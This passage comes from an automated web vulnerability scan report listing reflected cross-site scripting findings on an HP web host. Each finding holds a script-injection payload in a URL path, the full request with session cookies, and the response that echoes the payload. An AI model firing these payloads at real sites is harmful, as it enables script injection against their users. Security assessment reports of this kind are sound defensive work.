Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:37 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 31045


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is7c73a"><script>alert(1)</script>ca2e809aac9/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.42. http://h30187.www3.hp.com/is/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 610a4"><script>alert(1)</script>1cb31b9e7a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is610a4"><script>alert(1)</script>1cb31b9e7a8/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:33 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30920


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is610a4"><script>alert(1)</script>1cb31b9e7a8/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.43. http://h30187.www3.hp.com/is/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aca59"><script>alert(1)</script>64456137cdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isaca59"><script>alert(1)</script>64456137cdb/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:38 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 31017


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/isaca59"><script>alert(1)</script>64456137cdb/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.44. http://h30187.www3.hp.com/pv.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /pv.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd428"><script>alert(1)</script>30a6c3b6743 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pv.gifbd428"><script>alert(1)</script>30a6c3b6743?s=null&cid=700&u=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jspca059%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Eaf8ce681eb5&nocache=1315176274807 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392C1E4830C54ECB49A6E4104218808A781F7C4F8A19AB96069A029839FFE95A122B91AE95A1A2770D491AC17E946292851; JSESSIONID=abcu_31OsxeEtfZ2jN2it; EMID=

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 22:44:56 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#EwXjHLlvV+s=; path=/; expires=Sat, 23-Sep-2079 01:59:03 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 31452


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/pv.gifbd428"><script>alert(1)</script>30a6c3b6743?printable=true&u=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jspca059%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Eaf8ce681eb5&s=null&nocache=1315176274807&cid=700">
...[SNIP]...

3.45. http://h30187.www3.hp.com/resources/scripts/builder.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/builder.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6084c"><script>alert(1)</script>69270061d23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources6084c"><script>alert(1)</script>69270061d23/scripts/builder.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30858


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources6084c"><script>alert(1)</script>69270061d23/scripts/builder.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.46. http://h30187.www3.hp.com/resources/scripts/builder.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/builder.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb48a"><script>alert(1)</script>3f76bf537ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptscb48a"><script>alert(1)</script>3f76bf537ca/builder.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:01 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 30777
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptscb48a"><script>alert(1)</script>3f76bf537ca/builder.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.47. http://h30187.www3.hp.com/resources/scripts/builder.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/builder.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41dd4"><script>alert(1)</script>b17d3fbe7e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/builder.js41dd4"><script>alert(1)</script>b17d3fbe7e4?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:07 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30765


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/builder.js41dd4"><script>alert(1)</script>b17d3fbe7e4?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.48. http://h30187.www3.hp.com/resources/scripts/controls.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/controls.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1f38"><script>alert(1)</script>c169c88a19c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resourcesb1f38"><script>alert(1)</script>c169c88a19c/scripts/controls.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30804


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resourcesb1f38"><script>alert(1)</script>c169c88a19c/scripts/controls.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.49. http://h30187.www3.hp.com/resources/scripts/controls.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/controls.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae318"><script>alert(1)</script>97c24640801 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsae318"><script>alert(1)</script>97c24640801/controls.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30779


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsae318"><script>alert(1)</script>97c24640801/controls.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.50. http://h30187.www3.hp.com/resources/scripts/controls.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/controls.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2499c"><script>alert(1)</script>0bcb6abd0c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/controls.js2499c"><script>alert(1)</script>0bcb6abd0c9?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30875


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/controls.js2499c"><script>alert(1)</script>0bcb6abd0c9?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.51. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/cmdatatagutils.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 728fa"><script>alert(1)</script>591dcd90ff0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources728fa"><script>alert(1)</script>591dcd90ff0/scripts/coremetrics/cmdatatagutils.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:58 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30779


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources728fa"><script>alert(1)</script>591dcd90ff0/scripts/coremetrics/cmdatatagutils.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.52. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/cmdatatagutils.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb23"><script>alert(1)</script>ad6b72789ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsdcb23"><script>alert(1)</script>ad6b72789ff/coremetrics/cmdatatagutils.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30841


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsdcb23"><script>alert(1)</script>ad6b72789ff/coremetrics/cmdatatagutils.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.53. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/cmdatatagutils.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 706b0"><script>alert(1)</script>aeaafebd9d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/coremetrics706b0"><script>alert(1)</script>aeaafebd9d9/cmdatatagutils.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30892


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics706b0"><script>alert(1)</script>aeaafebd9d9/cmdatatagutils.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.54. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 4]

Summary

Severity:   High
